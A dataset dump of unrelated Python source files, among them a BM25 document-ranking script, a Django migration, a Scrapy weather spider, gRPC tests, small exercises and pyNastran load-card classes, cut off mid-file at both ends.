context_list.append(word.word)\n context_list.append(pynlpir.segment(doc[\"text\"], pos_tagging=False))\n # context_list.append(pynlpir.get_key_words(doc[\"text\"]))\n context_idmap[_id] = str(index)\n context_idmap[str(index)] = _id\n pbar.update(1)\n save_pkl_data(context_list, path.get('context_list'))\n save_pkl_data(context_idmap, path.get('context_idmap'))\n\n\n return question_list, question_idmap, context_list, context_idmap\n\n\ndef get_test_with_doc(test, bm25_model, context_idmap, k=5):\n test_with_doc = []\n with tqdm(total=len(test)) as pbar:\n pbar.set_description('build test_with doc in top-{}'.format(k))\n for item in test:\n question = item['question']\n qid = item['id']\n q_cut = []\n word_li = HanLP.segment(question)\n for word in word_li:\n q_cut.append(word.word)\n\n # q_cut = pynlpir.segment(question, pos_tagging=False)\n bm25_score = bm25_model.get_scores(q_cut)\n bm25_score = [[context_idmap[str(index)], score] for index, score in enumerate(bm25_score)]\n bm25_score.sort(key=op.itemgetter(1), reverse=True)\n best_doc_id = [item[0] for item in bm25_score[:k]]\n test_sample = {\n 'qid': qid,\n 'question': question,\n 'contexts': best_doc_id,\n }\n test_with_doc.append(test_sample)\n pbar.update(1)\n save_pkl_data(test_with_doc, './test_with_doc_top{}.pkl'.format(k))\n\n\ndef get_train_with_doc(train, bm25_model, context_idmap, k=5):\n save_path = '../data/rank/train_with_doc_top{}.pkl'.format(k)\n if os.path.exists(save_path):\n train_with_doc = load_pkl_data(save_path)\n else:\n train_with_doc = []\n with tqdm(total=len(train)) as pbar:\n pbar.set_description('build train with doc in top-{}'.format(k))\n for item in train:\n question = item['question']\n qid = item['qid']\n # q_cut = []\n # # word_li = HanLP.segment(question)\n # for word in word_li:\n # q_cut.append(word.word)\n q_cut = pynlpir.segment(question, pos_tagging=False)\n # q_cut = pynlpir.get_key_words(question)\n bm25_score = bm25_model.get_scores(q_cut)\n bm25_score = [[context_idmap[str(index)], score] for index, score in enumerate(bm25_score)]\n bm25_score.sort(key=op.itemgetter(1), reverse=True)\n best_text_id = [item[0] for item in bm25_score[:k]]\n # if item['docid'] in best_doc_id:\n # answer = item['answer']\n\n train_sample = {\n 'qid': qid,\n 'question': question,\n 'text_ids': best_text_id,\n 'answer': item['answer'],\n 'answer_span': item['answer_span'],\n \"docid\":item['docid']\n }\n\n train_with_doc.append(train_sample)\n pbar.update(1)\n save_pkl_data(train_with_doc, save_path)\n return train_with_doc\n\n\n\nif __name__ == '__main__':\n pynlpir.open()\n path = {\n 'train': '../data/train_data1.pkl',\n 'test': '../data/test_data.pkl',\n 'documents': '../data/policies_context.pkl',\n 'train_dict': '../data/rank/train_dict_y.pkl',\n 'context_dict': './data/rank/context_dict2_y.pkl',\n 'context_corpus': '../data/rank/context_corpus_y.pkl',\n 'result': '../data/rank/result_bm25_y.pkl',\n 'bad_samples': '../data/rank/bad_samples_y.pkl',\n 'context_list': '../data/rank/context_list_y.pkl',\n 'context_idmap': '../data/rank/context_idmap_y.pkl',\n 'BM25_model': '../data/rank/BM25_model_y.gen'\n }\n\n if os.path.exists(path.get('result')) and True:\n result = load_pkl_data(path.get('result'))\n else:\n train = load_pkl_data(path.get('train'))\n test = load_pkl_data(path.get('test'))\n context = load_pkl_data(path.get('documents'))\n\n train_dict, train_ids = get_train_dict_and_ids(path.get('train_dict'), train)\n context_dict = get_context_dict(path.get('context_dict'), context)\n question_list, question_idmap, context_list, context_idmap = build_list_and_idmap(train_dict, context_dict, path)\n\n bm25_model = BM25(context_list)\n\n train_data = get_train_with_doc(train, bm25_model, context_idmap, 30)\n\n # result = {}\n # with tqdm(total=len(question_list)) as pbar:\n # pbar.set_description('compute bm25 for each question')\n # for index, question in enumerate(question_list):\n # qid = question_idmap[str(index)]\n # true_docid = train_dict[qid]['docid']\n # bm25_score = bm25_model.get_scores(question)\n # bm25_score = [[context_idmap[str(index)], score] for index, score in enumerate(bm25_score)]\n # bm25_score.sort(key=op.itemgetter(1), reverse=True)\n #\n # result[qid] = {\n # 'true_docid': true_docid,\n # 'id': qid,\n # 'doc_scores': bm25_score,\n # }\n # pbar.update(1)\n #\n # save_pkl_data(result, path.get('result'))\n cal_top_acc(train_data, context_dict, K=30)\n # cal_MAP(result)\n\n print('end')\n pynlpir.close()","sub_path":"retrieve/rank_by_bm25.py","file_name":"rank_by_bm25.py","file_ext":"py","file_size_in_byte":10589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"302409953","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('name', models.CharField(max_length=128)),\n ('slug', models.SlugField(max_length=128, unique=True)),\n ('date', models.DateField(help_text='e.g. the date the project was started or first made publicly available.')),\n ('project_url', models.URLField(blank=True, help_text='Link to project homepage or \"project overview\" style pages.')),\n ('demo_url', models.URLField(blank=True, help_text='Link to somewhere the user can try the project out.')),\n ('source_url', models.URLField(blank=True, help_text='Link to public Git repo, etc.')),\n ('image', models.ImageField(blank=True, upload_to='', help_text='Logo or screenshot. Requires Pillow to be installed.')),\n ('technologies', models.CharField(max_length=128, help_text='List what the project was built with here.')),\n ('description', models.TextField(help_text='Describe what the project does. You may use Markdown here.')),\n ],\n ),\n ]\n","sub_path":"projects/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"260084532","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\nC2017-39\r\n\r\n\r\n\"\"\"\r\nimport scrapy\r\nfrom carbuisness.items import w58officeitem\r\nimport time\r\nfrom scrapy.conf import settings\r\nfrom scrapy.mail import MailSender\r\nimport logging\r\nimport json\r\nimport re\r\nimport random\r\nimport hashlib\r\nfrom hashlib import md5\r\nfrom carbuisness.getip import getProxy\r\nfrom selenium import webdriver\r\nfrom scrapy.xlib.pydispatch import dispatcher\r\nfrom scrapy import signals\r\nfrom scrapy.conf import settings\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nfrom carbuisness.items import WeatherItem\r\n\r\nwebsite='weather_tianqihoubao'\r\n\r\nclass CarSpider(scrapy.Spider):\r\n\r\n name=website\r\n start_urls = [\r\n \"http://www.tianqihoubao.com/lishi/\"\r\n ]\r\n\r\n def __init__(self,**kwargs):\r\n super(CarSpider,self).__init__(**kwargs)\r\n self.mailer=MailSender.from_settings(settings)\r\n self.counts=0\r\n self.carnum=800000\r\n\r\n settings.set('CrawlCar_Num',self.carnum,priority='cmdline')\r\n settings.set('MONGODB_DB','carbusiness',priority='cmdline')\r\n settings.set('MONGODB_COLLECTION',website,priority='cmdline')\r\n\r\n\r\n def parse(self, response):\r\n dls = response.xpath(\"//*[@id='content']/div[3]/dl\")\r\n for dl in dls:\r\n print(dl.xpath(\"./dd/a/text()\").extract_first())\r\n if dl.xpath(\"./dd/a/text()\").extract_first() in ['上海','咸阳']:\r\n city_url = response.urljoin(dl.xpath(\"./dd/a/@href\").extract_first())\r\n # print(city_url)\r\n yield scrapy.Request(url=city_url, callback=self.parse_url)\r\n # yield scrapy.Request(url=\"http://www.tianqihoubao.com/lishi/shanghai.html\", callback=self.parse_url)\r\n # yield scrapy.Request(url=\"http://www.tianqihoubao.com/lishi/xiaogan.html\", callback=self.parse_url)\r\n\r\n\r\n def parse_url(self, response):\r\n uls = response.xpath(\"//*[@id='content']/div[@class='box pcity']/ul\")\r\n for ul in uls:\r\n details_urls = ul.xpath(\".//a\")\r\n # print(details_urls)\r\n for details_url in details_urls:\r\n # print(response.urljoin(details_url.xpath(\"@href\").extract_first()))\r\n yield scrapy.Request(url=response.urljoin(details_url.xpath(\"@href\").extract_first()), callback=self.parse_details)\r\n\r\n def parse_details(self,response):\r\n\r\n trs = response.xpath(\"//*[@id='content']/table/tr\")\r\n print(trs)\r\n for tr in trs:\r\n print(tr)\r\n if trs.index(tr) is not 0:\r\n print(\"yes\")\r\n item = WeatherItem()\r\n item['grabtime'] = time.strftime('%Y-%m-%d %X', time.localtime())\r\n item['url'] = response.url\r\n item['data'] = tr.xpath(\"./td[1]/a/text()\").extract_first().strip()\r\n item['status'] = tr.xpath(\"./td[1]/a/@href\").extract_first()\r\n item['weather'] = tr.xpath(\"./td[2]/text()\").extract_first().strip()\r\n item['temp'] = tr.xpath(\"./td[3]/text()\").extract_first().strip()\r\n item['wind'] = tr.xpath(\"./td[4]/text()\").extract_first().strip()\r\n item['data_url'] = tr.xpath(\"./td[1]/a/@href\").extract_first()\r\n item['title'] = response.xpath(\"//*[@id='content']/h1/text()\").extract_first()\r\n yield item\r\n","sub_path":"cagey/carbuisness/carbuisness/spiders/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"81496095","text":"# Copyright 2018 gRPC authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests servicers sending OK status without having read all requests.\n\nThis is a regression test of https://github.com/grpc/grpc/issues/6891.\n\"\"\"\n\nimport enum\nimport unittest\n\nimport six\n\nimport grpc\n\nfrom tests.unit import test_common\nfrom tests.unit.framework.common import test_constants\n\n_RPC_METHOD = '/serffice/Meffod'\n\n\n@enum.unique\nclass _MessageCount(enum.Enum):\n\n ZERO = (\n 0,\n 'Zero',\n )\n TWO = (\n 1,\n 'Two',\n )\n MANY = (\n test_constants.STREAM_LENGTH,\n 'Many',\n )\n\n\n@enum.unique\nclass _MessageSize(enum.Enum):\n EMPTY = (\n 0,\n 'Empty',\n )\n SMALL = (\n 32,\n 'Small',\n ) # Smaller than any flow control window.\n LARGE = (\n 3 * 1024 * 1024,\n 'Large',\n ) # Larger than any flow control window.\n\n\n_ZERO_MESSAGE = b''\n_SMALL_MESSAGE = b'\\x07' * _MessageSize.SMALL.value[0]\n_LARGE_MESSAGE = b'abc' * (_MessageSize.LARGE.value[0] // 3)\n\n\n@enum.unique\nclass _ReadRequests(enum.Enum):\n\n ZERO = (\n 0,\n 'Zero',\n )\n TWO = (\n 2,\n 'Two',\n )\n\n\nclass _Case(object):\n\n def __init__(self, request_count, request_size, request_reading,\n response_count, response_size):\n self.request_count = request_count\n self.request_size = request_size\n self.request_reading = request_reading\n self.response_count = response_count\n self.response_size = response_size\n\n def create_test_case_name(self):\n return '{}{}Requests{}Read{}{}ResponsesEarlyOKTest'.format(\n self.request_count.value[1], self.request_size.value[1],\n self.request_reading.value[1], self.response_count.value[1],\n self.response_size.value[1])\n\n\ndef _message(message_size):\n if message_size is _MessageSize.EMPTY:\n return _ZERO_MESSAGE\n elif message_size is _MessageSize.SMALL:\n return _SMALL_MESSAGE\n elif message_size is _MessageSize.LARGE:\n return _LARGE_MESSAGE\n\n\ndef _messages_to_send(count, size):\n for _ in range(count.value[0]):\n yield _message(size)\n\n\ndef _draw_requests(case, request_iterator):\n for _ in range(\n min(case.request_count.value[0], case.request_reading.value[0])):\n next(request_iterator)\n\n\ndef _draw_responses(case, response_iterator):\n for _ in range(case.response_count.value[0]):\n next(response_iterator)\n\n\nclass _MethodHandler(grpc.RpcMethodHandler):\n\n def __init__(self, case):\n self.request_streaming = True\n self.response_streaming = True\n self.request_deserializer = None\n self.response_serializer = None\n self.unary_unary = None\n self.unary_stream = None\n self.stream_unary = None\n self._case = case\n\n def stream_stream(self, request_iterator, servicer_context):\n _draw_requests(self._case, request_iterator)\n\n for response in _messages_to_send(self._case.response_count,\n self._case.response_size):\n yield response\n\n\nclass _GenericHandler(grpc.GenericRpcHandler):\n\n def __init__(self, case):\n self._case = case\n\n def service(self, handler_call_details):\n return _MethodHandler(self._case)\n\n\nclass _EarlyOkTest(unittest.TestCase):\n\n def setUp(self):\n self._server = test_common.test_server()\n port = self._server.add_insecure_port('[::]:0')\n self._server.add_generic_rpc_handlers((_GenericHandler(self.case),))\n self._server.start()\n\n self._channel = grpc.insecure_channel('localhost:%d' % port)\n self._multi_callable = self._channel.stream_stream(_RPC_METHOD)\n\n def tearDown(self):\n self._server.stop(None)\n\n def test_early_ok(self):\n requests = _messages_to_send(self.case.request_count,\n self.case.request_size)\n\n response_iterator_call = self._multi_callable(requests)\n\n _draw_responses(self.case, response_iterator_call)\n\n self.assertIs(grpc.StatusCode.OK, response_iterator_call.code())\n\n\ndef _cases():\n for request_count in _MessageCount:\n for request_size in _MessageSize:\n for request_reading in _ReadRequests:\n for response_count in _MessageCount:\n for response_size in _MessageSize:\n yield _Case(request_count, request_size,\n request_reading, response_count,\n response_size)\n\n\ndef _test_case_classes():\n for case in _cases():\n yield type(case.create_test_case_name(), (_EarlyOkTest,), {\n 'case': case,\n '__module__': _EarlyOkTest.__module__,\n })\n\n\ndef load_tests(loader, tests, pattern):\n return unittest.TestSuite(\n tests=tuple(\n loader.loadTestsFromTestCase(test_case_class)\n for test_case_class in _test_case_classes()))\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"src/python/grpcio_tests/tests/unit/_early_ok_test.py","file_name":"_early_ok_test.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"557728752","text":"# Array-2\n\n## Problem1 (https://leetcode.com/problems/find-all-numbers-disappeared-in-an-array/)\n\n\n#Time Complexity : O(n)\n# Space Complexity : O(n) \n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n\n\nclass Solution:\n def findDisappearedNumbers(self, nums: List[int]) -> List[int]:\n result=[0]*(len(nums)+1)\n for i in nums:\n result[i]+=1\n temp=[]\n for index,val in enumerate(result):\n if index!=0 and val==0:\n temp.append(index)\n return temp","sub_path":"Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"495505184","text":"# python\nimport os\n\n# 3rd party\nimport pytest\nimport unittest\n\n# label_studio\nfrom label_studio import server\nfrom label_studio.tests.base import (\n test_client, captured_templates, goc_project,\n)\nfrom label_studio.tests.e2e_actions import (\n prepare,\n action_config, action_config_test,\n action_import, action_import_test,\n action_get_all_tasks,\n action_get_task,\n action_next_task,\n action_delete_task, action_delete_all_tasks,\n action_cancel_task,\n action_label, action_label_test,\n action_get_all_completions,\n action_get_change_completion,\n action_export, action_export_test,\n)\nfrom label_studio.tests.scenarios import scenarios\n\n\nACTIONS = {\n 'prepare': prepare,\n 'config': action_config,\n 'import': action_import,\n 'get_task': action_get_task,\n 'get_all_tasks': action_get_all_tasks,\n 'next_task': action_next_task,\n 'delete_task': action_delete_task,\n 'delete_all_tasks': action_delete_all_tasks,\n 'cancel_task': action_cancel_task,\n 'label': action_label,\n 'get_all_completions': action_get_all_completions,\n 'change_completion': action_get_change_completion,\n 'export': action_export\n}\n\n\n@pytest.fixture(autouse=True)\ndef default_project(monkeypatch):\n \"\"\"\n apply patch for\n label_studio.server.project_get_or_create()\n for all tests.\n \"\"\"\n monkeypatch.setattr(server, 'project_get_or_create', goc_project)\n\n\ndef idfn(test_val):\n return list(test_val.keys())[0]\n\n\nclass TestCase:\n \"\"\"\n Test case parametrised factory\n to run different scenarios\n from scenarios\n \"\"\"\n\n test_case_config = scenarios\n\n @pytest.mark.parametrize('test_case_config', test_case_config, ids=idfn)\n def test_start(self, test_client, test_case_config):\n case = list(test_case_config.values())[0]\n for a, data in case:\n ACTIONS[a](test_client, data)\n","sub_path":"label_studio/tests/e2e_test.py","file_name":"e2e_test.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"540737672","text":"import sys\nfrom PyQt5.QtWidgets import *\n\nclass DropWidget(QWidget):\n def __init__(self, parent=None):\n super(DropWidget, self).__init__(parent)\n self.setAcceptDrops(True)\n\n def dragEnterEvent(self, event):\n event.accept()\n mimeData = event.mimeData()\n print('dragEnterEvent')\n\n\n def dropEvent(self, event):\n event.accept()\n mimeData = event.mimeData()\n print('dropEvent')\n for mimetype in mimeData.formats():\n print('MIMEType:', mimetype)\n print('Data:', mimeData.data(mimetype))\n print()\n print()\n\ndef main():\n app = QApplication(sys.argv)\n w = DropWidget()\n w.resize(800, 600)\n w.show()\n w.raise_()\n app.exec_()\n\nif __name__ == '__main__':\n main()","sub_path":"stimulation/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"119839949","text":"from pygeocoder import Geocoder\n\nimport numpy as np\nimport time\n\ndef get_coordinates(location, timeout = 25):\n counter = 0\n result = (np.nan,np.nan)\n while True:\n try:\n result = Geocoder.geocode(location)\n return result.coordinates\n except Exception as e:\n counter = counter + 1\n if counter >= timeout:\n result = (np.nan,np.nan)\n print(e)\n return result\n time.sleep(2)\n \n \n#print(get_coordinates('Aachen',timeout=3))","sub_path":"GeoCodingTool.py","file_name":"GeoCodingTool.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"342819065","text":"from sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata=pd.read_csv(\"ex3.txt\",delimiter=\",\")\n#data=data.as_matrix()\n\nX1=data.iloc[:,[0]].values\nX2=data.iloc[:,[1]].values\nad=data.iloc[:,[2]].values\n\nprint(ad)\n\n#Plot and show\n\nplt.scatter(X1, X2, c=ad)\nplt.show()\n\nX=data.iloc[:,:-1].values\ny=data.iloc[:, -1].values\nprint(X)\nprint(y)\n\n#Splitting the data\n\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.40)\n\n#Using KNN\n\nknn=KNeighborsClassifier(n_neighbors=4)\nknn.fit(X_train,y_train)\ny_pred=knn.predict(X_test)\n\nprint(y_pred)\n\n#Plot and show\n\nplt.scatter(y_test,y_pred)\nplt.show()\n","sub_path":"DAY5/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"639686873","text":"# pylint: disable=C0103,R0902,R0904,R0914,W0231,R0201\r\n\"\"\"\r\nAll static loads are defined in this file. This includes:\r\n\r\n * LSEQ\r\n * DLOAD\r\n * DAREA\r\n * SLOAD\r\n * TLOAD1\r\n * TLOAD2\r\n * RFORCE\r\n * RLOAD1\r\n * RLOAD2\r\n * RANDPS\r\n\"\"\"\r\nfrom __future__ import (nested_scopes, generators, division, absolute_import,\r\n print_function, unicode_literals)\r\n#import sys\r\nfrom itertools import izip\r\n\r\nfrom pyNastran.bdf.fieldWriter import set_blank_if_default\r\nfrom pyNastran.bdf.cards.baseCard import BaseCard\r\nfrom pyNastran.bdf.bdfInterface.assign_type import (integer, integer_or_blank,\r\n double, double_or_blank,\r\n integer_string_or_blank,\r\n string_or_blank, integer_double_or_blank,\r\n components_or_blank)\r\nfrom pyNastran.bdf.fieldWriter import print_card_8\r\nfrom pyNastran.bdf.fieldWriter16 import print_card_16\r\n\r\n\r\nclass Load(BaseCard):\r\n \"\"\"defines the DefaultLoad class\"\"\"\r\n type = 'DefLoad'\r\n\r\n def __init__(self, card, data):\r\n self.cid = None\r\n self.nodes = None\r\n\r\n def Cid(self):\r\n if isinstance(self.cid, int):\r\n return self.cid\r\n else:\r\n return self.cid.cid\r\n\r\n def nodeIDs(self, nodes=None):\r\n \"\"\"returns nodeIDs for repr functions\"\"\"\r\n if not nodes:\r\n nodes = self.nodes\r\n if isinstance(nodes[0], int):\r\n return [node for node in nodes]\r\n else:\r\n return [node.nid for node in nodes]\r\n\r\n\r\nclass LoadCombination(Load): # LOAD, DLOAD\r\n def __init__(self, card, data):\r\n Load.__init__(self, card, data)\r\n\r\n if card:\r\n #: load ID\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n #: overall scale factor\r\n self.scale = double(card, 2, 'scale')\r\n\r\n #: individual scale factors (corresponds to loadIDs)\r\n self.scaleFactors = []\r\n\r\n #: individual loadIDs (corresponds to scaleFactors)\r\n self.loadIDs = []\r\n\r\n # alternating of scale factor & load set ID\r\n nLoads = len(card) - 3\r\n assert nLoads % 2 == 0\r\n for i in xrange(nLoads // 2):\r\n n = 2 * i + 3\r\n self.scaleFactors.append(double(card, n, 'scaleFactor'))\r\n self.loadIDs.append(integer(card, n + 1, 'loadID'))\r\n else:\r\n self.sid = data[0]\r\n self.scale = data[1]\r\n self.scaleFactors = data[2]\r\n self.loadIDs = data[3]\r\n assert len(data) == 4, '%s data=%s' % (self.type, data)\r\n\r\n def cross_reference(self, model):\r\n loadIDs2 = []\r\n msg = ' which is required by %s=%s' % (self.type, self.sid)\r\n for loadID in self.loadIDs:\r\n loadID2 = model.Load(loadID, msg=msg)\r\n loadIDs2.append(loadID2)\r\n self.loadIDs = loadIDs2\r\n\r\n def LoadID(self, lid):\r\n if isinstance(lid, int):\r\n return lid\r\n elif isinstance(lid, list):\r\n return lid[0].sid\r\n else:\r\n raise NotImplementedError(lid)\r\n\r\n #def Sid(self):\r\n # try:\r\n # if isinstance(self.sid, int):\r\n # return self.sid\r\n # elif isinstance(self.sid, list):\r\n # #sys.stderr.write('type(lid[0]) = %s' %(type(self.lid[0])))\r\n # #sys.stderr.write(\"the offending load...%s\" %(self.lid[0]))\r\n # return self.sid[0].sid\r\n # #elif isinstance(self.lid,load)\r\n # else:\r\n # #sys.stderr.write(\"the offending load...%s\" %(self.lid))\r\n # return self.sid.sid\r\n # except:\r\n # msg = \"error in loads.py - self.lid=\\n %s\\n\" % (str(self.sid))\r\n # sys.stderr.write(msg)\r\n # raise\r\n\r\n #def LoadID(self, loadID):\r\n #print(\"load = \",loadID)\r\n #if isinstance(loadID, int):\r\n # return loadID\r\n #elif isinstance(loadID, list):\r\n # return loadID[0].LoadID()\r\n ##print(\"self.lid = \",load.lid)\r\n #asdf\r\n #return load.lid\r\n\r\n def getLoads(self):\r\n \"\"\"\r\n .. note:: requires a cross referenced load\r\n \"\"\"\r\n loads = []\r\n for allLoads in self.loadIDs:\r\n for load in allLoads:\r\n loads += load.getLoads()\r\n #loads += self.ID #: :: todo: what does this mean, was uncommented\r\n return loads\r\n\r\n\r\nclass LSEQ(BaseCard): # Requires LOADSET in case control deck\r\n \"\"\"\r\n Defines a sequence of static load sets\r\n\r\n .. todo:: how does this work...\r\n \"\"\"\r\n type = 'LSEQ'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n self.sid = integer(card, 1, 'sid')\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n self.lid = integer(card, 3, 'lid')\r\n self.tid = integer_or_blank(card, 4, 'tid')\r\n assert len(card) <= 5, 'len(LSEQ card) = %i' % len(card)\r\n else:\r\n self.sid = data[0]\r\n self.exciteID = data[1]\r\n self.lid = data[2]\r\n self.tid = data[3]\r\n raise NotImplementedError()\r\n\r\n #def nodeIDs(self, nodes=None):\r\n #\"\"\"returns nodeIDs for repr functions\"\"\"\r\n #if not nodes:\r\n # nodes = self.nodes\r\n #if isinstance(nodes[0], int):\r\n # return [node for node in nodes]\r\n #else:\r\n # return [node.nid for node in nodes]\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by %s=%s' % (self.type, self.sid)\r\n self.lid = model.Load(self.lid, msg=msg)\r\n if self.tid:\r\n self.tid = model.Table(self.tid, msg=msg)\r\n\r\n def LoadID(self, lid):\r\n if isinstance(lid, int):\r\n return lid\r\n elif isinstance(lid, list):\r\n return self.LoadID(lid[0])\r\n else:\r\n return lid.sid\r\n #raise RuntimeError(lid)\r\n\r\n def getLoads(self):\r\n return self.lid\r\n\r\n def Lid(self):\r\n if isinstance(self.lid, int):\r\n return self.lid\r\n else:\r\n return self.LoadID(self.lid)\r\n #raise NotImplementedError('LSEQ ' + str(self.lid) +\r\n # '\\n%s' % (type(self.lid)))\r\n\r\n def Tid(self):\r\n if self.tid is None:\r\n return None\r\n elif isinstance(self.tid, int):\r\n return self.tid\r\n return self.tid.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['LSEQ', self.sid, self.exciteID, self.Lid(), self.Tid()]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n return self.rawFields()\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.rawFields()\r\n return self.comment() + print_card_8(card)\r\n\r\n\r\nclass DLOAD(LoadCombination):\r\n type = 'DLOAD'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n LoadCombination.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n\r\n def rawFields(self):\r\n list_fields = ['DLOAD', self.sid, self.scale]\r\n for (scaleFactor, loadID) in izip(self.scaleFactors, self.loadIDs):\r\n list_fields += [scaleFactor, self.LoadID(loadID)]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n return self.rawFields()\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.rawFields()\r\n return self.comment() + print_card_8(card)\r\n\r\n\r\nclass DAREA(BaseCard):\r\n \"\"\"\r\n Defines scale (area) factors for static and dynamic loads. In dynamic\r\n analysis, DAREA is used in conjunction with ACSRCE, RLOADi and TLOADi\r\n entries.\r\n ::\r\n\r\n DAREA SID P1 C1 A1 P2 C2 A2\r\n DAREA 3 6 2 8.2 15 1 10.1\r\n \"\"\"\r\n type = 'DAREA'\r\n\r\n def __init__(self, card=None, nOffset=0, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n nOffset *= 3\r\n self.sid = integer(card, 1, 'sid')\r\n self.p = integer(card, 2 + nOffset, 'p')\r\n self.c = components_or_blank(card, 3 + nOffset, 'c', 0)\r\n self.scale = double(card, 4 + nOffset, 'scale')\r\n else:\r\n self.sid = data[0]\r\n self.p = data[1]\r\n self.c = data[2]\r\n self.scale = data[3]\r\n assert len(data) == 4, 'data = %s' % data\r\n\r\n def rawFields(self):\r\n list_fields = ['DAREA', self.sid, self.p, self.c, self.scale]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.rawFields()\r\n return self.comment() + print_card_8(card)\r\n\r\n\r\nclass TabularLoad(BaseCard):\r\n def __init__(self, card, data):\r\n pass\r\n\r\n\r\nclass SLOAD(Load):\r\n \"\"\"\r\n Static Scalar Load\r\n\r\n Defines concentrated static loads on scalar or grid points.\r\n\r\n .. note:: Can be used in statics OR dynamics.\r\n\r\n If Si refers to a grid point, the load is applied to component T1 of the\r\n displacement coordinate system (see the CD field on the GRID entry).\r\n \"\"\"\r\n type = 'SLOAD'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n #: load ID\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n nfields = len(card) - 2\r\n n = nfields // 2\r\n if nfields % 2 == 1:\r\n n += 1\r\n msg = 'Missing last magnitude on SLOAD card=%s' % card.fields()\r\n raise RuntimeError(msg)\r\n\r\n self.nids = []\r\n self.mags = []\r\n for i in xrange(n):\r\n j = 2 * i + 2\r\n self.nids.append(integer(card, j, 'nid' + str(i)))\r\n self.mags.append(double(card, j + 1, 'mag' + str(i)))\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by %s=%s' % (self.type, self.sid)\r\n for (i, nid) in enumerate(self.nids):\r\n self.nids[i] = model.Node(nid, msg=msg)\r\n\r\n def Nid(self, node):\r\n if isinstance(node, int):\r\n return node\r\n return node.nid\r\n\r\n def getLoads(self):\r\n \"\"\"\r\n .. todo:: not done\r\n \"\"\"\r\n return []\r\n\r\n def rawFields(self):\r\n list_fields = ['SLOAD', self.sid]\r\n for (nid, mag) in izip(self.nids, self.mags):\r\n list_fields += [self.Nid(nid), mag]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n return self.rawFields()\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.rawFields()\r\n return self.comment() + print_card_8(card)\r\n\r\n\r\nclass TLOAD1(TabularLoad):\r\n r\"\"\"\r\n Transient Response Dynamic Excitation, Form 1\r\n\r\n Defines a time-dependent dynamic load or enforced motion of the form:\r\n\r\n .. math::\r\n \\left\\{ P(t) \\right\\} = \\left\\{ A \\right\\} \\cdot F(t-\\tau)\r\n\r\n for use in transient response analysis.\r\n \"\"\"\r\n type = 'TLOAD1'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n TabularLoad.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n #: load ID\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n #: Identification number of DAREA or SPCD entry set or a thermal load\r\n #: set (in heat transfer analysis) that defines {A}. (Integer > 0)\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n\r\n #: If it is a non-zero integer, it represents the\r\n #: identification number of DELAY Bulk Data entry that defines .\r\n #: If it is real, then it directly defines the value of that will\r\n #: be used for all degrees-of-freedom that are excited by this\r\n #: dynamic load entry. See also Remark 9. (Integer >= 0,\r\n #: 